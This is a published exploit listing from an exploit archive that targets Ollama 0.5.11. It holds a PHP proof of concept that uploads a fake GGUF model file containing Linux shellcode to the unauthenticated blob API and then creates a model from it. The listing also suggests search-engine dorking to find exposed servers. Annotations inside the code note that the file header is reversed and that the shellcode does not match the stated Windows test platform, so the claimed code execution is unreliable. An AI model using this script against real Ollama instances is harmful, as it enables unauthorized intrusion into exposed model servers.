## https://sploitus.com/exploit?id=PACKETSTORM:189475
=============================================================================================================================================
| # Title : Ollama 0.5.11 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://github.com/ollama/ollama |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] What this code does:
Uploads an untrusted file, which may lead to remote code execution (RCE).
Injects malicious shellcode into the model file.
[+] Save the code as poc.php.
[+] Usage: cmd => c:\www\test\php poc.php
[+] Change the target URL on the two lines 9 and 27.
[+] PayLoad :
<?php
/**
 * Compute the SHA-256 digest of a byte string.
 *
 * @param string $raw_content Bytes to hash.
 * @return string Lowercase hexadecimal digest (64 characters).
 */
function get_sha256($raw_content) {
    $algorithm = 'sha256';
    $digest = hash($algorithm, $raw_content);

    return $digest;
}
/**
 * POST raw bytes to the blob endpoint of the HTTP API at localhost:11434.
 *
 * The blob is addressed by the SHA-256 of its own content, which is placed in
 * the URL path. No authentication header is set, so the request can only
 * succeed where the API accepts unauthenticated callers; the control that
 * matters on the server side is who can reach port 11434 at all.
 *
 * @param string $model_raw_content Bytes sent verbatim as the POST body.
 * @return string Hex SHA-256 digest of $model_raw_content. It is returned
 *                whether or not the HTTP request succeeded.
 */
function upload_model($model_raw_content) {
    $digest = get_sha256($model_raw_content);
    $endpoint = sprintf('http://localhost:11434/api/blobs/sha256:%s', $digest);

    $handle = curl_init($endpoint);
    curl_setopt_array($handle, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $model_raw_content,
    ]);
    $body = curl_exec($handle);
    curl_close($handle);

    // curl_exec() yields false on a transport failure; it is not checked here
    // and prints as an empty string.
    echo "upload_model response: " . $body . "\n";

    return $digest;
}
/**
 * Ask the HTTP API at localhost:11434 to create a model from an uploaded blob.
 *
 * Sends a JSON body to /api/create that names the model and maps the file
 * name "test.gguf" to the blob digest. The path printed first is informational
 * only; this function never reads that file.
 *
 * For log review: the request pair this script produces is a POST to
 * /api/blobs/sha256:<digest> followed by a POST to /api/create, both sent
 * without credentials.
 *
 * @param string $model_name Name given to the new model.
 * @param string $sha256     Hex digest of the blob to build the model from.
 * @return void
 */
function create_model($model_name, $sha256) {
    echo "create_model from file: ~/.ollama/models/blobs/sha256-{$sha256}\n";

    $files = ["test.gguf" => "sha256:{$sha256}"];
    $json_body = json_encode([
        "model" => $model_name,
        "files" => $files,
    ]);

    $handle = curl_init('http://localhost:11434/api/create');
    curl_setopt_array($handle, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
        CURLOPT_POSTFIELDS => $json_body,
    ]);
    $reply = curl_exec($handle);
    curl_close($handle);

    // A failed request (curl_exec() === false) prints as an empty response.
    echo "create_model response: " . $reply . "\n";
}
// Script body: assemble a byte string presented as a GGUF model file, upload it
// as a blob, then request creation of a model that references that blob.
//
// Build the file contents with a header and filler data.
// NOTE(review): the literal starts with "FUGG", the reverse of the usual "GGUF"
// magic; "valid GGUF header" below is the author's description, not verified here.
$model_contents = "FUGG00000000000000000000"; // described by the author as a valid GGUF header
$model_contents .= "\x00\x00\x00\x01"; // n_kv, a small value (author's label)
$model_contents .= "\x00\x00\x00\x01"; // additional data
$model_contents .= "0000\xaa0000000"; // data padding
// Shellcode, per the author: NOP sled + execve("/bin/id").
// NOTE(review): nothing on this page shows the server executing these bytes;
// they are sent only as file content. The trailing \xcd\x80 looks like the
// 32-bit Linux syscall instruction, which does not match the "Tested on :
// windows 10" header, so treat the code-execution claim as unverified.
$shellcode = str_repeat("\x90", 50); // NOP sled
$shellcode .= "\x31\xc0\x50\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
// Append the shellcode bytes to the model contents.
$model_contents .= $shellcode;
// Append 1024 zero bytes of padding; the author's stated purpose is to avoid an unexpected EOF.
$model_contents .= str_repeat("\x00", 1024);
// Upload the model bytes; the returned value is the hex SHA-256 of the contents.
$sha256 = upload_model($model_contents);
// Build a unique model name.
// For log review: every name this script creates starts with "testing-model-"
// followed by a uniqid() value, which makes the prefix a usable search term.
$model_name = "testing-model-" . uniqid();
create_model($model_name, $sha256);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================